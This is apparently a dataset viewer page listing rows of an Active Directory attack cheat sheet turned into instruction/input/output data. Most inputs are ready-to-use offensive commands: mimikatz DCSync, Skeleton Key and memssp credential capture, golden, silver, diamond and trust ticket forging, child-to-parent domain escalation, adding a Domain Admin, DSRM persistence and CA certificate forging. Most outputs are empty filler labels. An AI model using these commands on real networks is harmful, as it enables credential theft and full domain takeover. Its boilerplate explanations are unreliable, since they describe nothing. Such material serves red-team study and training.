instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Enumeration | MATCH p=(:Domain)-[:TrustedBy]->(:Domain) RETURN p | Note or procedural step under 'Enumeration'. |
Enumeration | Get Domains SID | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainSID -Domain <domain> Get-DomainSID -Domain <target_domain> | Note or procedural step under 'Enumeration'. |
Enumeration | lookupsid.py -domain-sids <domain>/<user>:<password>'@<dc> 0 lookupsid.py -domain-sids <domain>/<user>:<password>'@<target_dc> 0 | Note or procedural step under 'Enumeration'. |
Child->Parent | Trust Key | Note or procedural step under 'Child->Parent'. |
Child->Parent | mimikatz lsadump::trust /patch | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | mimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbtgt /target:<target_domain> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | secretsdump.py -just-dc-user '<parent_domain>$' <domain>/<user>:<password>@<dc_ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | ticketer.py -nthash <trust_key> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 -spn krbtgt/<parent_domain> trustfakeuser | Note or procedural step under 'Child->Parent'. |
Child->Parent | Golden Ticket | Note or procedural step under 'Child->Parent'. |
Child->Parent | mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | raiseChild.py <child_domain>/<user>:<password> | Note or procedural step under 'Child->Parent'. |
Child->Parent | ticketer.py -nthash <child_krbtgt_hash> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 goldenuser | Note or procedural step under 'Child->Parent'. |
Child->Parent | Unconstrained delegation | Note or procedural step under 'Child->Parent'. |
Child->Parent | coerce parent_dc on child_dc domain #unconstrained delegation | Note or procedural step under 'Child->Parent'. |
Parent->Child | same as Child to parent | Note or procedural step under 'Parent->Child'. |
External Trust | DomainA <--> DomainB trust (B trust A, A trust B) | Note or procedural step under 'External Trust'. |
External Trust | from A to B FOREST_TRANSITIVE | Note or procedural step under 'External Trust'. |
External Trust | password reuse | Note or procedural step under 'External Trust'. |
External Trust | lat move (creds/pth/...) | Note or procedural step under 'External Trust'. |
External Trust | Foreign group and users | Note or procedural step under 'External Trust'. |
External Trust | Users with foreign Domain Group Membership | Note or procedural step under 'External Trust'. |
External Trust | MATCH p=(n:User {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p | Note or procedural step under 'External Trust'. |
External Trust | Group with foreign Domain Group Membership | Note or procedural step under 'External Trust'. |
External Trust | MATCH p=(n:Group {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p | Note or procedural step under 'External Trust'. |
External Trust | SID History on B | Note or procedural step under 'External Trust'. |
External Trust | Golden ticket | Note or procedural step under 'External Trust'. |
External Trust | mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
External Trust | mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
External Trust | ticketer.py -nthash <krbtgt> -domain-sid <domain_a> -domain <domain_a> -extra-sid <domain_b_sid>-<group_sid sup 1000> fakeuser | Note or procedural step under 'External Trust'. |
External Trust | Trust ticket | Note or procedural step under 'External Trust'. |
External Trust | ADCS abuse | Note or procedural step under 'External Trust'. |
External Trust | Unconstrained delegation | Note or procedural step under 'External Trust'. |
External Trust | coerce dc_b on dc_a #Uncontrained Delegation (ADCS) | Note or procedural step under 'External Trust'. |
External Trust | from A to B is FOREST_TRANSITIVE|TREAT_AS_EXTERNAL | Note or procedural step under 'External Trust'. |
External Trust | DomainA <-- DomainB trust (B trust A / A access B) | Note or procedural step under 'External Trust'. |
External Trust | Same as double trust, but no unconstrained delegation as B can't connect to A | Note or procedural step under 'External Trust'. |
External Trust | DomainA --> DomainB trust (A trust B / B access A) | Note or procedural step under 'External Trust'. |
External Trust | password reuse #lat move (creds/pth/...) | Note or procedural step under 'External Trust'. |
Mssql links | MSSQL trusted links doesn't care of trust link | Note or procedural step under 'Mssql links'. |
Mssql links | Get-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance> | Note or procedural step under 'Mssql links'. |
Mssql links | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'Mssql links'. |
Mssql links | trustlink | Note or procedural step under 'Mssql links'. |
Mssql links | sp_linkedservers | Note or procedural step under 'Mssql links'. |
Mssql links | use_link | Note or procedural step under 'Mssql links'. |
ADD DA | net group "domain admins" myuser /add /domain | Note or procedural step under 'ADD DA'. |
Golden Ticket | ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser> | Note or procedural step under 'Golden Ticket'. |
Golden Ticket | mimikatz "kerberos::golden /user:<admin_user> /domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Silver Ticket | mimikatz "kerberos::golden /sid:<current_user_sid> /domain:<domain-sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes256_key> /user:<any_user> /ptt" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Silver Ticket | ticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser> | Note or procedural step under 'Silver Ticket'. |
Silver Ticket | Directory Service Restore Mode (DSRM)\ | Note or procedural step under 'Silver Ticket'. |
Silver Ticket | PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD | Note or procedural step under 'Silver Ticket'. |
Skeleton Key | mimikatz "privilege::debug" "misc::skeleton" "exit" #password is mimikatz | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Custom SSP | mimikatz "privilege::debug" "misc::memssp" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Custom SSP | C:\Windows\System32\kiwissp.log | Note or procedural step under 'Custom SSP'. |
Golden certificate | certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash> | Note or procedural step under 'Golden certificate'. |
Golden certificate | certipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL> | Note or procedural step under 'Golden certificate'. |
Diamond ticket | ticketer.py -request -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> -user-id <user_id> -groups '512,513,518,519,520' <anyuser> | Note or procedural step under 'Diamond ticket'. |
Saphire Ticket | ticketer.py -request -impersonate <anyuser> -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> 'ignored' | Note or procedural step under 'Saphire Ticket'. |
Mind map reference | Scan Network | Section heading from the mind map, representing a phase or grouping. |
Mind map reference | Find DC IP | Reference or note from the mind map without a specific command. |
Mind map reference | Zone Transfer | Section heading from the mind map, representing a phase or grouping. |
Mind map reference | Anonymous & Guest access on SMB shares | Reference or note from the mind map without a specific command. |
Mind map reference | Enumerate LDAP: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Enumerate Users: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Bruteforce users: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Poisoning: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Coerce: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Unauthenticated PetitPotam (CVE-2022-26925) | Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations. |
Mind map reference | PXE: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | no password | Reference or note from the mind map without a specific command. |
Mind map reference | password protected | Reference or note from the mind map without a specific command. |
Mind map reference | TimeRoasting: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Quick Compromise: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Zerologon (unsafe) CVE-2020-1472: | Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations. |
Mind map reference | Eternal Blue MS17-010: | Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations. |
Mind map reference | Tomcat/Jboss Manager: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Java RMI: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Java Serialiszed port: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Log4shell: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Database: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Exchange: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Veeam: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | GLPI: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Weak websites / services: | Category or heading in the mind map indicating a class of techniques (not a specific command). |
Mind map reference | Valid user (no password) | Reference or note from the mind map without a specific command. |
Mind map reference | Password Spray | Section heading from the mind map, representing a phase or grouping. |
Mind map reference | ASREPRoast | Reference or note from the mind map without a specific command. |
Mind map reference | Blind Kerberoasting | Section heading from the mind map, representing a phase or grouping. |
Mind map reference | Man in The Middle (Listen and Relay) | Reference or note from the mind map without a specific command. |
Mind map reference | Listen | Section heading from the mind map, representing a phase or grouping. |
Mind map reference | NTLM relay | Reference or note from the mind map without a specific command. |
Mind map reference | To LDAP(S) | Reference or note from the mind map without a specific command. |
Mind map reference | To SMB | Reference or note from the mind map without a specific command. |
Mind map reference | TO HTTP | Reference or note from the mind map without a specific command. |
Mind map reference | To MsSQL | Reference or note from the mind map without a specific command. |
Mind map reference | SMB -> NETLOGON | Reference or note from the mind map without a specific command. |
Mind map reference | SMB -> SMB | Reference or note from the mind map without a specific command. |
Mind map reference | SMB -> LDAP(S) | Reference or note from the mind map without a specific command. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.